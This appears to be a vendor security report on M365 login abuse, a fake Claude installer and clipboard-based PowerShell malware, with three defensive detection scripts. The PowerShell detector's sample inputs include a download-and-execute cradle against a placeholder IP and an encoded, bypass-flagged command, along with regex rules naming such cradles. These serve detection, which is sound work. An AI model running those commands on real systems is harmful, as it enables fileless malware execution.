SOC Threat Radar — May 2026
The latest Barracuda Research findings on threats facing businesses
Takeaways
- This month’s incidents mitigated by Barracuda Managed XDR show how modern attack techniques are designed to make attacks look normal, trusted or invisible.
- A rise in malicious Microsoft 365 logins from IP addresses that look legitimate and from low-risk countries.
- Attackers using a fake Claude AI installer to deliver malware.
- Malware delivered and executed directly from the clipboard to avoid detection.
Malicious Microsoft 365 logins look more convincing and low risk
What’s happening?
Attackers are successfully signing in to Microsoft 365 accounts from IP addresses that look like those of legitimate users. To do this, they use VPNs or rotate IP addresses frequently, which helps their activity blend in with everyday employee logins.
Researchers noted that in April there was an increase of around 25% in malicious logins coming from low-risk countries such as the UK and the U.S., rather than regions that are more usually associated with suspicious logins.
Because these incidents are successful sign-ins rather than failed login attempts, security tools that look for a pattern of repeated failures can miss them entirely.
Your organization may be at risk if you:
- Mainly monitor failed login attempts and not successful ones
- Rely only on location-based rules to spot suspicious access
- Allow users to reuse passwords
- Have compromised accounts from a previous phishing attack
- Have a weak or inconsistent approach to multifactor authentication (MFA)
- Assume logins from the UK or U.S. are automatically “safe”
Once attackers have a valid login, they can quietly access email, files and internal systems without raising immediate alarms.
To protect your organization:
- Monitor all logins, regardless of source or outcome
- Follow up on any unusual or unexpected behavior after login (new devices, new locations, odd times)
- Enforce strong MFA everywhere, especially for email and admin accounts
- Regularly review sign-in logs for patterns that don’t match normal user behavior
- Use threat intelligence to identify known risky IPs, even if logins succeed
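The five controls above come down to one detection problem: scoring sign-ins that succeeded, using what is known about the user rather than where the IP geolocates. The script below is an added example written for this report, not Barracuda's or Microsoft's code. Its baseline and sign-in records are constructed and only loosely modelled on Entra ID sign-in log fields; the field names (user, asn, device, country, lat/lon, success) are assumptions to map onto your own export. Both constructed suspicious sign-ins come from the UK or U.S. and succeed, so a country rule or a failed-login counter would see nothing.

```python
"""Flag successful Microsoft 365 sign-ins that deviate from a per-user baseline.

Added example for this report, not Barracuda's code. The records below are
constructed and only loosely modelled on Entra ID sign-in log fields; the
field names (user, asn, device, country, lat/lon, success) are assumptions,
so map them to whatever your log export actually calls them.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed 30-day baseline per user: networks, devices and countries seen before.
BASELINE = {
    "alice@example.com": {"asn": {"AS64500"}, "device": {"dev-a1"}, "country": {"GB"}},
    "bob@example.com": {"asn": {"AS64501"}, "device": {"dev-b1"}, "country": {"US"}},
}

# Constructed sign-in events. Every suspicious one comes from a "low-risk"
# country and succeeds, so country rules and failure counts see nothing.
EVENTS = [
    {"user": "alice@example.com", "time": "2026-04-14T08:02:00", "asn": "AS64500",
     "device": "dev-a1", "country": "GB", "lat": 51.50, "lon": -0.12, "success": True},
    {"user": "alice@example.com", "time": "2026-04-14T09:10:00", "asn": "AS64502",
     "device": "dev-unknown", "country": "GB", "lat": 53.48, "lon": -2.24, "success": True},
    {"user": "bob@example.com", "time": "2026-04-14T12:00:00", "asn": "AS64501",
     "device": "dev-b1", "country": "US", "lat": 40.71, "lon": -74.00, "success": True},
    {"user": "bob@example.com", "time": "2026-04-14T12:30:00", "asn": "AS64503",
     "device": "dev-b1", "country": "US", "lat": 34.05, "lon": -118.24, "success": True},
    {"user": "bob@example.com", "time": "2026-04-14T13:00:00", "asn": "AS64504",
     "device": "dev-x", "country": "RU", "lat": 55.75, "lon": 37.62, "success": False},
]

MAX_PLAUSIBLE_KMH = 900.0  # assumption: faster than an airliner between two successes is suspect


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two coordinates."""
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def reasons_for(event, baseline, previous):
    """List why a successful sign-in deviates from the user's baseline (empty = looks normal)."""
    base = baseline.get(event["user"], {"asn": set(), "device": set(), "country": set()})
    reasons = []
    if event["asn"] not in base["asn"]:
        reasons.append("new_asn")
    if event["device"] not in base["device"]:
        reasons.append("new_device")
    if event["country"] not in base["country"]:
        reasons.append("new_country")
    if previous is not None:
        hours = (datetime.fromisoformat(event["time"])
                 - datetime.fromisoformat(previous["time"])).total_seconds() / 3600
        km = haversine_km(previous["lat"], previous["lon"], event["lat"], event["lon"])
        if hours > 0 and km / hours > MAX_PLAUSIBLE_KMH:
            reasons.append("impossible_travel")
    return reasons


def detect(events, baseline):
    """Score every successful sign-in; returns {(user, time): reasons} for the flagged ones."""
    alerts = {}
    last_success = {}
    for ev in sorted(events, key=lambda e: (e["user"], e["time"])):
        if not ev["success"]:
            continue  # failure-pattern rules cover these; this detector is about the successes
        reasons = reasons_for(ev, baseline, last_success.get(ev["user"]))
        if reasons:
            alerts[(ev["user"], ev["time"])] = reasons
        last_success[ev["user"]] = ev
    return alerts


if __name__ == "__main__":
    for (user, when), why in detect(EVENTS, BASELINE).items():
        print(f"{when} {user}: {', '.join(why)}")
```

Alice's second sign-in is flagged for a new network and a new device although it is from the UK like every other login she has made; Bob's second is flagged because a new network and a Los Angeles location half an hour after New York is not travel a person can do. The failed Russian attempt is deliberately left to the failure-pattern rules, which is the point of the section: the successes are where this class of attack hides. Building the baseline from 30 days of real logs, and feeding known-bad IPs from threat intelligence in as an extra reason, are the obvious next steps.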
Fake Claude AI installer used to deliver malware
What’s happening?
Cybercriminals are using widespread interest in AI tools as a lure. In one example seen by Barracuda researchers, a user tried to download Claude Code but was redirected to a convincing fake website.
Instead of installing the real software, the site triggered a multi-stage malware attack. The malware executed a PowerShell script, stole browser-stored credentials, communicated with an attacker-controlled server, and made itself harder to remove by installing malicious certificates. The attack was contained within seconds, but even that was long enough for some post-exploitation activity, including credential access and persistence, to take place.
Your organization may be at risk if you:
- Allow users to install software from any source — including search ads and unofficial sites — without checks or permissions
- Don’t manage and control the use of AI tools across the organization
- Permit the use of browser-stored credentials
- Haven’t integrated AI-related scams into your security awareness training
As AI tools become more common at work, attackers are increasingly using AI‑branded names to make their malware look trustworthy.
To protect your organization:
- Establish policies that ensure staff can only install software from official vendor websites
- Block lookalike and newly registered domains where possible
- Educate users that AI tools are now a high‑value lure for attackers
- Limit who can install software on company devices
- Use endpoint protection that can spot malicious behavior, not just known files
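"Block lookalike domains" is easy to say and harder to operationalise, because the lookalike is rarely a one-character typo: it is the brand name with a digit swapped in, on a different TLD, or padded with words like "download" or "setup". The script below is an added example for this report, not Barracuda's code or any vendor's block list. The allowlist and every candidate domain are constructed for illustration (the .example TLD is reserved and never resolves), the two-label registrable-domain split is a simplification of what the Public Suffix List would give you, and domain age, the "newly registered" half of the advice, needs a WHOIS or RDAP lookup that is out of scope here.

```python
"""Triage candidate domains against a brand allowlist to catch lookalikes.

Added example for this report, not Barracuda's code. The brand list and the
candidate domains are constructed for illustration (the .example TLD is
reserved and never resolves); the two-label registrable-domain split is a
simplification, so use the Public Suffix List in production. Domain age
(the "newly registered" half of the advice) needs a WHOIS/RDAP lookup and is
not attempted here.
"""

# Constructed allowlist of the domains users are permitted to install from.
OFFICIAL_DOMAINS = ["claude.ai", "anthropic.com"]

# Characters commonly swapped in to look like letters; extend to fit your brands.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
MULTI_CHAR = [("rn", "m"), ("vv", "w")]


def registrable_label(domain):
    """Second-level label of a domain, e.g. 'claude' for 'www.claude.ai'."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def normalize(label):
    """Undo the usual digit/letter and multi-character homoglyph substitutions."""
    label = label.lower().translate(HOMOGLYPHS)
    for src, dst in MULTI_CHAR:
        label = label.replace(src, dst)
    return label


def levenshtein(a, b):
    """Edit distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain, official=OFFICIAL_DOMAINS):
    """Return ('allow' | 'lookalike' | 'unknown', brand matched or None)."""
    d = domain.lower().strip(".")
    for brand in official:
        if d == brand or d.endswith("." + brand):
            return "allow", brand
    candidate = normalize(registrable_label(d))
    for brand in official:
        brand_label = registrable_label(brand)
        # brand name on another TLD, with a homoglyph, with one typo, or padded
        # with extra words ("brand-download"): all of these count as lookalikes
        if brand_label in candidate or levenshtein(candidate, brand_label) <= 1:
            return "lookalike", brand
    return "unknown", None


def triage(domains, official=OFFICIAL_DOMAINS):
    """Classify a batch; the 'lookalike' bucket is what you would feed a block list."""
    return {d: classify(d, official) for d in domains}


CANDIDATES = [  # constructed for this example
    "claude.ai", "docs.anthropic.com", "c1aude.example",
    "claude-code-download.example", "claud.example", "anthrop1c.example", "example.org",
]

if __name__ == "__main__":
    for dom, (verdict, brand) in triage(CANDIDATES).items():
        print(f"{verdict:10} {dom}" + (f"  (impersonates {brand})" if brand else ""))
```

The substring test is deliberately broad: a short brand name will collide with unrelated words, so review the "lookalike" bucket before it becomes a hard block, and treat "unknown" as what it says rather than as safe. Pairing this with a registration-age feed is what turns it into the "newly registered" control the list above asks for.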
Malware using clipboard tricks to avoid detection
What’s happening?
Researchers found malware trying to evade detection by loading malicious code into the clipboard and running it directly in memory using PowerShell instead of installing a traditional malicious file onto a computer. Because nothing obvious was saved to disk, this technique is harder for basic security tools to catch.
Such incidents are categorized by researchers as high-severity activity. The malware was able to contact its command-and-control server, obtain the malicious payload, copy it into the clipboard, and execute it locally using PowerShell.
The suspicious command-and-control beacon triggered a security alert, and XDR quickly contained the threat.
Your organization may be at risk if:
- You rely mainly on antivirus software that scans files, rather than behavior
- You enable unrestricted PowerShell use across endpoints
- Endpoints aren’t monitored for suspicious in-memory activity
- Admin tools are available to general users
- There is limited visibility into what happens after a user clicks a link
In-memory techniques are increasingly popular because they help attackers stay invisible for longer.
To protect your organization:
- Monitor behavior as well as files, and especially PowerShell activity
- Restrict PowerShell use to users who genuinely need it
- Flag any execution policy bypasses and unusual scripting behavior
- Quarantine devices automatically when suspected command‑and‑control activity is detected
- Assume attackers will try to avoid traditional malware files and plan detection accordingly
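The clipboard trick leaves no file to scan, but it does leave a script block: with PowerShell Script Block Logging enabled, the decoded text of every executed block lands in Event ID 4104, which is where behaviour-based detection of this technique lives. The script below is an added example for this report, not Barracuda's detection content or any vendor's rule set. It runs a handful of regex rules over constructed ScriptBlockText samples; the rule names, the abbreviation handling and the severity mapping are this example's own choices.

```python
"""Triage PowerShell script blocks for in-memory, clipboard-staged execution.

Added example for this report, not Barracuda's code. It runs regex rules over
the ScriptBlockText of PowerShell Script Block Logging events (Event ID 4104);
the sample blocks below are constructed, and the rule names and severity
mapping are this example's own choices, not an XDR vendor's detection content.
"""
import re

# Each rule: name -> compiled pattern, matched against the decoded script text.
RULES = {
    # clipboard contents piped or passed straight into an evaluator
    "clipboard_to_exec": re.compile(
        r"(?i)(?:Get-Clipboard\b[^|]*\|\s*(?:iex|invoke-expression)\b"
        r"|(?:iex|invoke-expression)\s*\(\s*Get-Clipboard)"),
    # common download cradles (curl/wget are Invoke-WebRequest aliases in Windows PowerShell)
    "download_cradle": re.compile(
        r"(?i)\b(?:DownloadString|DownloadData|DownloadFile|Invoke-WebRequest"
        r"|Invoke-RestMethod|iwr|irm|curl|wget)\b"),
    # -ExecutionPolicy Bypass and its accepted abbreviations (-Ep, -Ex, -Exec)
    "exec_policy_bypass": re.compile(r"(?i)-e(?:p|x(?:ec(?:utionpolicy)?)?)?\s+bypass\b"),
    # -EncodedCommand / -Enc / -e followed by a long base64 blob
    "encoded_command": re.compile(r"(?i)-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{20,}"),
    # -WindowStyle Hidden and its abbreviations
    "hidden_window": re.compile(r"(?i)-w(?:in(?:dowstyle)?)?\s+hidden\b"),
}

# Rules that on their own justify containment rather than a low-priority ticket.
HIGH_ALONE = {"clipboard_to_exec"}


def analyze(script_text):
    """Return the sorted names of the rules the script block trips."""
    return sorted(name for name, pat in RULES.items() if pat.search(script_text))


def severity(hits):
    """Map rule hits to a triage level: 'high', 'medium', 'low' or None."""
    if not hits:
        return None
    if HIGH_ALONE & set(hits) or {"encoded_command", "exec_policy_bypass"} <= set(hits):
        return "high"
    return "medium" if len(hits) >= 2 else "low"


# Constructed sample script blocks: (block id, ScriptBlockText).
SAMPLE_BLOCKS = [
    ("benign-1", "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv"),
    ("benign-2", "Get-Clipboard | Out-File C:\\temp\\notes.txt"),
    ("susp-1", "$p=(New-Object Net.WebClient).DownloadString('http://203.0.113.5/p.txt'); "
               "Set-Clipboard $p; Get-Clipboard | IEX"),
    ("susp-2", "powershell -NoP -W Hidden -Ep Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("susp-3", "Invoke-Expression (Get-Clipboard)"),
]


def triage(blocks):
    """Return {block_id: (severity, hits)} for every block, flagged or not."""
    out = {}
    for block_id, text in blocks:
        hits = analyze(text)
        out[block_id] = (severity(hits), hits)
    return out


if __name__ == "__main__":
    for block_id, (level, hits) in triage(SAMPLE_BLOCKS).items():
        print(f"{block_id:9} {level or 'clean':7} {', '.join(hits)}")
```

Two details matter in practice. First, the rules accept PowerShell's abbreviated parameters (-Ep, -W, -Enc), because attackers rely on analysts writing patterns for the long forms only. Second, a benign "Get-Clipboard | Out-File" is not flagged: the rule keys on clipboard contents reaching an evaluator, not on clipboard access itself, which keeps the noise down enough to let the high-severity hits drive the automatic quarantine the list above recommends. None of this works unless Script Block Logging is actually turned on, so check that policy before relying on 4104.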
How Barracuda Managed XDR can help your organization
Barracuda Managed XDR delivers advanced protection against the threats identified in this report by combining cutting-edge technology with expert SOC oversight. With real-time threat intelligence, automated responses, a 24/7/365 SOC team, and XDR Managed Vulnerability Security that identifies security gaps and oversights, Barracuda Managed XDR ensures comprehensive, proactive protection across your network, cloud, email, servers, and endpoints, giving you the confidence to stay ahead of evolving threats.
For further information on how we can help, please get in touch with Barracuda Managed XDR.